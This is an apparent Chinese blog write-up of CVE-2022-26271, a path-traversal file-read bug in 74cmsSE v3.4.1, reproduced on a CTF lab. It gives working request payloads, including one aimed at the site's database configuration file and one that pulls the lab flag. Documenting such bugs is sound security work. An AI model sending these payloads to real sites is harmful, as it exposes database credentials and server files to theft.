【漏洞复现】74cmsSEv3.4.1任意文件读取漏洞(CVE-2022-26271)
0x01 漏洞描述
春秋云镜靶场:74cmsSEv3.4.1存在任意文件读取漏洞。
CVE描述:74cmsSE v3.4.1 was discovered to contain an arbitrary file read vulnerability via the $url parameter at \index\controller\Download.php.
74cmsSEv3.4.1下载链接:https://www.74cms.com/downloadse/show/id/62.html
0x02 影响版本
74cmsSE v3.4.1
0x03 漏洞分析
在\upload\application\index\controller\Download.php的第10行,有一个文件操作函数,其中$url是用户可以控制的参数,不被过滤,$ourput_filename是要输出的文件名。
构造参数:
/index/download/index?name=index.php&url=../../application/database.php
参考漏洞提交者报告:https://github.com/N1ce759/74cmsSE-Arbitrary-File-Reading/issues/1
0x04 漏洞复现
进入靶场,界面如下:
构造payload:
/index/download/index?name=index.php&url=../../../../../../flag
页面直接下载index.php文件,打开后flag如下:
标签:74cmsSEv3.4,index,CVE,..,漏洞,2022,php From: https://www.cnblogs.com/0dot7/p/17228527.html